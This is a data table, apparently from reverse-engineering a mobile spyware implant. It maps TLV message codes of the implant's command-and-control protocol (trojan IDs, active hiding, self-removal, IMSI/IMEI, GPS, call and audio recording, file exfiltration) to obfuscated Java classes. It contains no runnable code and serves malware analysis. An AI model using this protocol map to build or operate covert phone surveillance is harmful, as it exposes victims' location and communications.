4033,test,8260416,,TlvTypeTestMemberIdentifier,
4033,test,8260736,,TlvTypeTestMemberName,
4096,target,8389008,,TlvTypeTargetData,
4096,target,8389280,,TlvTypeTargetHeartBeat,
4096,target,8389680,,TlvTypeTargetKeepSessionAlive,
4096,target,8390000,,TlvTypeTargetLocalIP,
4096,target,8390256,,TlvTypeTargetGlobalIP,
4096,target,8390448,,TlvTypeTargetState,
4097,agent master,8390784,,TlvTypeTargetID,
4097,agent master,8391072,,TlvTypeGetInstalledModulesRequest,
4097,agent master,8391328,,TlvTypeInstalledModulesReply,
4097,agent master,8391488,,TlvTypeTrojanUID,
4097,agent master,8391808,,TlvTypeTrojanID,
4097,agent master,8392000,,TlvTypeTrojanMaxInfections,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4097,agent master,8392240,,TlvTypeScreenSaverOn,
4097,agent master,8392496,,TlvTypeScreenLocked,
4098,agent master,8392752,,TlvTypeRecordedDataAvailable,
4098,agent master,8393024,,TlvTypeDownloadedRecordedDataTimeStamp,
4098,agent master,8393280,,TlvTypeInstallationMode,
4098,agent master,8393552,,TlvTypeTargetRemoveNotification,
4098,agent master,8393792,,TlvTypeTargetPlatformBits,
4098,agent master,8394032,,TlvTypeRemoveItselfMaxInfectionReached,
4098,agent master,8394288,,TlvTypeRemoveItselfAtMasterRequest,
4098,agent master,8394544,,TlvTypeRemoveItselfAtAgentRequest,
4099,agent master,8394912,,TlvTypeRemoveItselfAtAgentReqRequest,
4099,agent master,8395072,,TlvTypeRecordedFilesDownloadTotal,
4099,agent master,8395328,,TlvTypeRecordedFilesDownloadProgress,
4099,agent master,8395632,,TlvTypeTargetLicenseInfo,
4099,agent master,8395840,,TlvTypeRemoveTargetLicenseInfo,
4099,agent master,8396176,,TlvTypeTargetAllConfigurations,
4100,target error,8396960,,TlvTypeTargetError,
4102,target config,8401056,,TlvTypeGetTargetConfigRequest,
4102,target config,8401312,,TlvTypeTargetConfigReply,
4102,target config,8401568,,TlvTypeSetTargetConfigRequest,
4102,target config,8402304,,TlvTypeConfigTargetID,
4102,target config,8402496,,TlvTypeConfigTargetHeartbeatInterval,
4102,target config,8402800,,TlvTypeConfigTargetProxy,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4103,agent master,8403008,,TlvTypeConfigTargetPort,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4103,agent master,8403584,,TlvTypeConfigAutoRemovalDateTime,
4103,agent master,8403776,,TlvTypeConfigAutoRemovalIfNoProxy,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4103,agent master,8404032,,TlvTypeInternalAutoRemovalElapsedTime,
4104,active hiding config,8405040,,TlvTypeConfigActiveHiding,
4106,target module,8409248,,TlvTypeTargetLoadModuleRequest,
4106,target module,8409504,,TlvTypeTargetLoadModuleReply,
4106,target module,8409760,,TlvTypeTargetUnLoadModuleRequest,
4106,target module,8410016,,TlvTypeTargetUnLoadModuleReply,
4106,target module,8410272,,TlvTypeTargetUploadModuleRequest,
4106,target module,8410528,,TlvTypeTargetUploadModuleReply,
4106,target module,8410784,,TlvTypeTargetUploadModuleChunk,
4106,target module,8411040,,TlvTypeTargetUploadModuleDoneRequest,
4107,target module,8411296,,TlvTypeTargetUploadModuleDoneReply,
4107,target module,8411552,,TlvTypeTargetRemoveModuleRequest,
4107,target module,8411808,,TlvTypeTargetRemoveModuleReply,
4107,target module,8412064,,TlvTypeTargetOfflineUploadModuleRequest,
4107,target module,8412320,,TlvTypeTargetOfflineUploadModuleReply,
4107,target module,8412576,,TlvTypeTargetOfflineUploadModuleChunk,
4107,target module,8412832,,TlvTypeTargetOfflineUploadModuleDoneRequest,
4107,target module,8413088,,TlvTypeTargetOfflineUploadModuleDoneReply,
4108,target error,8413344,,TlvTypeTargetOfflineError,
4108,target error,8413600,,TlvTypeTargetUploadError,
4109,files reply master list agent mc,8415392,,TlvTypeMasterAgentListMCFilesReply,
4110,target recorded,8417440,,TlvTypeTargetGetRecordedFilesRequest,
4110,target recorded,8417696,,TlvTypeTargetRecordedFilesReply,
4110,target recorded,8417952,,TlvTypeTargetRecordedFileDownloadRequest,
4110,target recorded,8418208,,TlvTypeTargetRecordedFileDownloadReply,
4110,target recorded,8418464,,TlvTypeTargetRecordedFileDownloadChunk,
4110,target recorded,8418720,,TlvTypeTargetRecordedFileDownloadCompleted,
4110,target recorded,8418976,,TlvTypeTargetRecordedFileDeleteRequest,
4110,target recorded,8419232,,TlvTypeTargetRecordedFileDeleteReply,
4111,target recorded ex,8419488,,TlvTypeTargetGetRecordedFilesRequestEx,
4111,target recorded ex,8419744,,TlvTypeTargetRecordedFilesReplyEx,
4111,target recorded ex,8420000,,TlvTypeTargetRecordedFileDeleteRequestEx,
4111,target recorded ex,8420256,,TlvTypeTargetRecordedFilesDownloadRequestEx,
4128,data,8454544,,TlvTypeProxyData,
4128,data,8454800,,TlvTypeRelayData,
4130,proxy,8458400,,TlvTypeProxyTargetDisconnect,
4130,proxy,8458656,,TlvTypeProxyMobileTargetDisconnect,
4130,proxy,8458912,,TlvTypeProxyDummyHeartbeat,
4130,proxy,8459168,,TlvTypeProxyMobileDummyHeartbeat,
4160,master,8520080,,TlvTypeMasterData,
4160,master,8520768,,TlvTypeMasterMode,
4160,master,8521024,,TlvTypeMasterToken,
4160,master,8521344,,TlvTypeMasterQueryResult,
4161,string master alarm,8522368,,TlvTypeMasterAlarmString,
4192,agent,8585616,,TlvTypeAgentData,
4192,agent,8585808,,TlvTypeAgentQueryID,
4192,agent,8586048,,TlvTypeAgentQueryModSubmodID,
4192,agent,8586304,,TlvTypeAgentQueryFromDate,
4192,agent,8586560,,TlvTypeAgentQueryToDate,
4192,agent,8586816,,TlvTypeAgentQuerySortOrder,
4192,agent,8587136,,TlvTypeAgentQueryValueFilter,
4193,uid agent,8587328,,TlvTypeAgentUID,
4224,mobile,8651152,,TlvTypeMobileTargetData,
4224,mobile,8651376,,TlvTypeMobileTargetHeartBeatV10,"Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/o/g"
4224,mobile,8651632,,TlvTypeMobileTargetExtendedHeartBeatV10,"Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/q/b"
4224,mobile,8651888,,TlvTypeMobileHeartBeatReplyV10,"Lorg/xmlpush/v3/o/h$b, Lorg/xmlpush/v3/o/l$2, L/org/xmlpush/v3/q/a, L/org/xmlpush/v3/q/c"
4225,installed reply modules mobile,8653472,,TlvTypeMobileInstalledModulesReply,
4225,installed reply modules mobile,8652912,×,unknown,Lorg/xmlpush/v3/o/l$2
4226,module upload mobile target,8655008,,TlvTypeMobileTargetOfflineUploadModuleRequest,L/org/xmlpush/v3/o/h
4226,module upload mobile target,8656032,,TlvTypeMobileTargetUploadModuleRequest,
4226,module upload mobile target,8656288,,TlvTypeMobileTargetUploadModuleReply,
4226,module upload mobile target,8656544,,TlvTypeMobileTargetUploadModuleChunk,
4226,module upload mobile target,8656800,,TlvTypeMobileTargetUploadModuleDoneRequest,
4227,target mobile,8657056,,TlvTypeMobileTargetUploadModuleDoneReply,
4227,target mobile,8657312,,TlvTypeMobileTargetRemoveModuleRequest,
4227,target mobile,8657568,,TlvTypeMobileTargetRemoveModuleReply,
4227,target mobile,8657824,,TlvTypeMobileTargetOfflineUploadModuleReply,Lorg/xmlpush/v3/o/j
4227,target mobile,8658080,,TlvTypeMobileTargetOfflineUploadModuleChunk,L/org/xmlpush/v3/o/h
4227,target mobile,8658336,,TlvTypeMobileTargetOfflineUploadModuleDoneRequest,L/org/xmlpush/v3/o/h
4227,target mobile,8658592,,TlvTypeMobileTargetOfflineUploadModuleDoneReply,Lorg/xmlpush/v3/o/j
4227,target mobile,8658848,,TlvTypeMobileTargetOfflineError,
4228,mobile target,8659104,,TlvTypeMobileTargetError,
4228,mobile target,8659360,,TlvTypeMobileTargetGetRecordedFilesRequest,L/org/xmlpush/v3/o/h
4228,mobile target,8659616,,TlvTypeMobileTargetRecordedFilesReply,Lorg/xmlpush/v3/o/d
4228,mobile target,8659872,,TlvTypeMobileTargetRecordedFileDownloadRequest,L/org/xmlpush/v3/o/h
4228,mobile target,8660128,,TlvTypeMobileTargetRecordedFileDownloadReply,Lorg/xmlpush/v3/o/d
4228,mobile target,8660384,,TlvTypeMobileTargetRecordedFileDownloadChunk,Lorg/xmlpush/v3/o/d
4228,mobile target,8660640,,TlvTypeMobileTargetRecordedFileDownloadCompleted,Lorg/xmlpush/v3/o/d
4228,mobile target,8660896,,TlvTypeMobileTargetRecordedFileDeleteRequest,L/org/xmlpush/v3/o/h
4229,target reply delete mobile recorded file,8661152,,TlvTypeMobileTargetRecordedFileDeleteReply,
4230,mobile config target,8663968,,TlvTypeMobileTargetOfflineConfig,Lorg/xmlpush/v3/q/c
4230,mobile config target,8664224,,TlvTypeMobileTargetEmergencyConfigAsTLV,
4230,mobile config target,8664432,,TlvTypeMobileTargetEmergencyConfig,"L/org/xmlpush/v3/q/a, L/org/xmlpush/v3/q/c"
4234,load module mobile target,8671392,,TlvTypeMobileTargetLoadModuleRequest,
4234,load module mobile target,8671648,,TlvTypeMobileTargetLoadModuleReply,
4234,load module mobile target,8671904,,TlvTypeMobileTargetUnLoadModuleRequest,
4234,load module mobile target,8672160,,TlvTypeMobileTargetUnLoadModuleReply,
4236,target error,8675472,,TlvTypeMobileTargetHeartbeatEvents,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4236,agent master files mc reply list,8675648,,TlvTypeMobileTargetHeartbeatInterval,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4236,recorded target,8675984,,TlvTypeMobileTargetHeartbeatRestrictions,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4236,recorded target,8676208,,TlvTypeConfigSMSPhoneNumber,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4236,recorded target,8676496,,TlvTypeMobileTargetPositioning,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
4236,recorded target,8676672,,TlvTypeMobileTrojanUID,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/h/c, Lorg/xmlpush/v3/i/a, L/org/xmlpush/v3/h/c"
4236,recorded target,8676976,,TlvTypeMobileTrojanID,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4236,recorded target,8677296,,TlvTypeMobileTargetLocationChangedRange,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4237,config,8677440,,TlvTypeConfigMobileAutoRemovalDateTime,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4237,config,8677808,,TlvTypeConfigOverwriteProxyAndPhones,
4237,config,8678000,,TlvTypeConfigCallPhoneNumber,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4238,ex recorded target,8679488,,TlvTypeLocationAreaCode,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
4238,ex recorded target,8679744,,TlvTypeCellID,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
4238,ex recorded target,8680048,,TlvTypeMobileCountryCode,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
4238,data,8680304,,TlvTypeMobileNetworkCode,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
4238,data,8680560,,TlvTypeIMSI,
4238,proxy,8680816,,TlvTypeIMEI,
4238,proxy,8681072,,TlvTypeGPSLatitude,
4238,proxy,8681328,,TlvTypeGPSLongitude,
4239,proxy,8681520,,TlvTypeFirstHeartbeat,
4239,master,8681872,,TlvTypeInstalledModules,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4240,gps valid values,8683568,,TlvTypeValidGPSValues,
4288,mobile proxy comm target,8782176,,TlvTypeProxyMobileTargetCommSig,
4288,mobile proxy comm target,8782496,,TlvTypeProxyMobileTargetComm,
4288,mobile proxy comm target,8782752,,TlvTypeProxyMasterMobileTargetComm,
4384,master mobile,8978752,,TlvTypeMobileProxyMasterCommSig,
4384,master mobile,8978848,,TlvTypeMasterMobileTargetConn,
4384,master mobile,8979104,,TlvTypeMobileProxyMasterComm,
4384,master mobile,8979360,,TlvTypeMobileMasterProxyComm,
4384,master mobile,8979616,,TlvTypeProxyMasterMobileHeartBeatAnswer,"Lorg/xmlpush/v3/o/l$2, L/org/xmlpush/v3/o/h"
4384,master mobile,8979872,,TlvTypeMobileMasterProxyCommNotification,
8128,agent,16646544,,TlvTypePlaintext,
8128,agent uid,16646800,,TlvTypeCompression,
8128,mobile,16647056,,TlvTypeEncryption,"Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8128,mobile,16647232,,TlvTypeTargetUID,
8128,mobile,16647536,,TlvTypeIPAddress,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n"
8128,mobile,16647808,,TlvTypeUserName,
8128,installed reply modules mobile,16648064,,TlvTypeComputerName,
8129,installed reply modules mobile,16648304,,TlvTypeLoginName,
8129,module upload mobile target,16648560,,TlvTypePassphrase,
8129,module upload mobile target,16648832,,TlvTypeRecordID,
8129,module upload mobile target,16649088,,TlvTypeOwner,
8129,module upload mobile target,16649344,,TlvTypeMetaData,
8129,module upload mobile target,16649536,,TlvTypeModuleID,"Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8129,mobile target,16649856,,TlvTypeOSName,
8129,mobile target,16650048,,TlvTypeModuleSubID,"Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8130,mobile target,16650320,,TlvTypeErrorCode,
8130,mobile target,16650560,,TlvTypeOffset,
8130,mobile target,16650816,,TlvTypeLength,
8130,mobile target,16651088,,TlvTypeRequestID,"Lorg/xmlpush/v3/w, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/j, Lorg/xmlpush/v3/o/j, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/b, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8130,mobile target,16651328,,TlvTypeRequestType,
8130,mobile target,16651584,,TlvTypeVersion,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8130,mobile target,16651840,,TlvTypeMachineID,
8130,mobile target,16652096,,TlvTypeMajorNumber,
8131,mobile target,16652352,,TlvTypeMinorNumber,
8131,mobile target,16652656,,TlvTypeGlobalIPAddress,
8131,mobile target,16652912,,TlvTypeASCII_Filename,
8131,mobile target,16653120,,TlvTypeFilesize,
8131,mobile target,16653392,,TlvTypeFilecount,
8131,mobile target,16653712,,TlvTypeFiledata,
8131,target reply recorded delete file mobile,16653968,,TlvTypeMD5Sum,
8131,mobile target config,16654144,,TlvTypeProxyPort,
8132,mobile target config,16654400,,TlvTypeStatus,
8132,mobile target config,16654656,,TlvTypeUserID,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
8132,module load mobile target,16654912,,TlvTypeGroupID,
8132,module load mobile target,16655168,,TlvTypePermissions,
8132,module load mobile target,16655424,,TlvTypeRequestCode,
8132,module load mobile target,16655680,,TlvTypeDataSize,
8132,,16655936,,TlvTypeKeyType,
8132,,16656240,,TlvTypeEmail,
8133,,16656432,,TlvTypeEnabled,
8133,,16656688,,TlvTypeLicensed,
8133,,16656960,,TlvTypeAudioFrequency,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n"
8133,,16657216,,TlvTypeAudioBitsPerSample,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n"
8133,,16657472,,TlvTypeAudioChannels,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n"
8133,,16657728,,TlvTypeStartTime,
8133,config,16657984,,TlvTypeStopTime,
8133,config,16658240,,TlvTypeBitMask,
8134,config,16658560,,TlvTypeTimeZone,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
8134,,16658816,,TlvTypeDateTime,"Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b"
8134,,16659072,,TlvTypeStartSessionDateTime,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/i, Lorg/xmlpush/v3/o/n, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
8134,,16659328,,TlvTypeStopSessionDateTime,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/n"
8134,,16659520,,TlvTypeDateTimeRef,"L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8134,,16659776,,TlvTypeScheduleRepeat,"L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8134,,16660032,,TlvTypeUnixMasterDateTime,
8134,,16660288,,TlvTypeUnixUTCDateTime,
8135,,16660544,,TlvTypeDurationInSeconds,Lorg/xmlpush/v3/f/b
8135,,16660864,,TlvTypeMasterRefTime,
8135,,16661120,,TlvTypeMasterRefTimeStart,
8135,values gps valid,16661376,,TlvTypeMasterRefTimeEnd,
8135,,16661568,,TlvTypeCounter,"Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8135,,16661888,,TlvTypeWhiteListEntry,type: byte array
8135,,16662144,,TlvTypeBlackListEntry,type: array
8135,,16662336,,TlvTypeBlackWhiteListingMode,
8136,config,16662576,,TlvTypeConfigEnabled,
8136,config,16662848,,TlvTypeConfigMaxRecordingSize,
8136,config,16663104,,TlvTypeConfigAudioQuality,"Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n, L/org/xmlpush/v3/h/c"
8136,config,16663344,,TlvTypeConfigVideoBlackAndWhite,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c"
8136,config,16663616,,TlvTypeConfigVideoResolution,L/org/xmlpush/v3/h/c
8136,config,16663872,,TlvTypeConfigCaptureFrequency,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c"
8136,config,16664128,,TlvTypeConfigVideoQuality,"Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b, L/org/xmlpush/v3/h/c"
8136,config,16664384,,TlvTypeConfigFilesStandardFilter,
8137,config,16664704,,TlvTypeConfigFilesCustomFilter,
8137,config,16664896,,TlvTypeConfigStandardLocation,
8137,config,16665216,,TlvTypeConfigCustomLocation,
8137,config,16665408,,TlvTypeConfigFileChunkSize,
8137,config,16665664,,TlvTypeConfigFileTransferSpeed,
8137,config,16665904,,TlvTypeConfigUploadFileOverwrite,
8137,config,16666160,,TlvTypeConfigDeleteOverReboot,
8137,config,16666496,,TlvTypeConfigCustomLocationException,
8138,master mobile,16666752,,TlvTypeExtraData,
8138,master mobile,16667008,,TlvTypeSignature,
8138,,16667264,,TlvTypeComments,
8138,,16667520,,TlvTypeDescription,
8138,,16667776,,TlvTypeFilenameExtension,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/b"
8138,,16668032,,TlvTypeSessionType,
8138,,16668224,,TlvTypePeriod,
8138,,16668512,,TlvTypeMobileTargetUID,"Lorg/xmlpush/v3/w, Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/o/c, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/h/c, Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
8139,,16668784,,TlvTypeMobileTargetID,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
8139,,16669072,,TlvTypeMobilePlaintext,
8139,,16669328,,TlvTypeMobileCompression,Lorg/xmlpush/v3/k
8139,,16669584,,TlvTypeMobileEncryption,"Lorg/xmlpush/v3/o/m, Lorg/xmlpush/v3/h/c"
8139,,16669824,,TlvTypeEncodingType,
8139,,16670576,,TlvTypePhoneNumber,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a"
8140,custom config location mode,16670784,,TlvTypeConfigCustomLocationMode,
8140,custom config location mode,16672080,×,unknown,Lorg/xmlpush/v3/n/k
8140,custom config location mode,16671792,×,unknown,Lorg/xmlpush/v3/n/m
8142,network interface,16674928,,TlvTypeNetworkInterface,
8142,network interface,16675136,,TlvTypeNetworkInterfaceMode,
8142,network interface,16675440,,TlvTypeNetworkInterfaceAddress,
8142,network interface,16675696,,TlvTypeNetworkInterfaceNetmask,
8142,network interface,16675952,,TlvTypeNetworkInterfaceGateway,
8142,network interface,16676208,,TlvTypeNetworkInterfaceDNS_1,
8142,network interface,16676464,,TlvTypeNetworkInterfaceDNS_2,
8143,,16677440,,TlvTypeLoginTime,
8143,,16677696,,TlvTypeLogoffTime,
8143,,16678720,,TlvTypeGeneric_Type,
8144,,16678976,,TlvTypeChecksum,
8144,,16679280,,TlvTypeCity,
8144,,16679536,,TlvTypeCountry,
8144,,16679792,,TlvTypeCountryCode,
8146,,16683072,,TlvTypeTargetType,
8146,,16683392,,TlvTypeDurationString,Lorg/xmlpush/v3/o/a
8146,,16683904,×,unknown,Lorg/xmlpush/v3/n/m
8146,,16684848,×,unknown,"Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c"
8160,,16712000,,TlvTypeTargetConnectionBroken,
8160,,16712256,,TlvTypeAgentConnectionBroken,
8160,,16712512,,TlvTypeTargetOffline,
8176,,16744768,,TlvTypeProxyConnectionBroken,
4242,,8688960,×,unknown,Lorg/xmlpush/v3/w
4242,,8689296,×,unknown,Lorg/xmlpush/v3/w
4242,,8689568,×,unknown,Lorg/xmlpush/v3/w
2752,,5636992,×,unknown,Lorg/xmlpush/v3/n/k
2752,,5637504,×,unknown,Lorg/xmlpush/v3/n/k
2752,,5637760,×,unknown,Lorg/xmlpush/v3/n/k
2752,,5636464,×,unknown,Lorg/xmlpush/v3/n/m
2752,,5636736,×,unknown,Lorg/xmlpush/v3/n/m
2752,,5637248,×,unknown,Lorg/xmlpush/v3/n/m
2753,,5638256,×,unknown,Lorg/xmlpush/v3/n/m
2753,,5638768,×,unknown,Lorg/xmlpush/v3/n/m
2754,,5641600,×,unknown,Lorg/xmlpush/v3/n/m
2754,,5640608,×,unknown,Lorg/xmlpush/v3/n/m
2754,,5641120,×,unknown,Lorg/xmlpush/v3/n/m
2754,,5640864,×,unknown,Lorg/xmlpush/v3/n/m
2754,,5640352,×,unknown,Lorg/xmlpush/v3/n/m
2218,,4542832,×,unknown,Lorg/xmlpush/v3/t/d
2218,,4542624,×,unknown,Lorg/xmlpush/v3/t/d
8147,,16685104,×,unknown,"Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c"
8147,,16685392,×,unknown,"Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c"
2658,,5444000,×,unknown,Lorg/xmlpush/v3/o/k
2658,,5444512,×,unknown,Lorg/xmlpush/v3/o/k
2656,,5440320,×,unknown,Lorg/xmlpush/v3/o/k
2656,,5439904,×,unknown,Lorg/xmlpush/v3/o/k
2660,,5447840,×,unknown,Lorg/xmlpush/v3/o/k
2722,,5575072,×,unknown,Lorg/xmlpush/v3/o/a
2722,,5575328,×,unknown,Lorg/xmlpush/v3/o/a
2722,config,5575840,×,unknown,Lorg/xmlpush/v3/o/a
2560,config,5243552,×,unknown,Lorg/xmlpush/v3/o/i
2560,config,5243296,×,unknown,Lorg/xmlpush/v3/o/i
4244,config,8693104,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8692080,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8692336,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8692592,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8692848,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8693360,×,unknown,Lorg/xmlpush/v3/o/g
4244,config,8691872,×,unknown,Lorg/xmlpush/v3/o/g
2690,config,5509536,×,unknown,Lorg/xmlpush/v3/o/b
2690,config,5510048,×,unknown,Lorg/xmlpush/v3/o/b
2692,config,5513376,×,unknown,Lorg/xmlpush/v3/o/b
2688,config,5505856,×,unknown,Lorg/xmlpush/v3/o/b
2688,config,5505440,×,unknown,Lorg/xmlpush/v3/o/b
2592,config,5309088,×,unknown,Lorg/xmlpush/v3/o/e
2602,,5329824,×,unknown,Lorg/xmlpush/v3/o/e
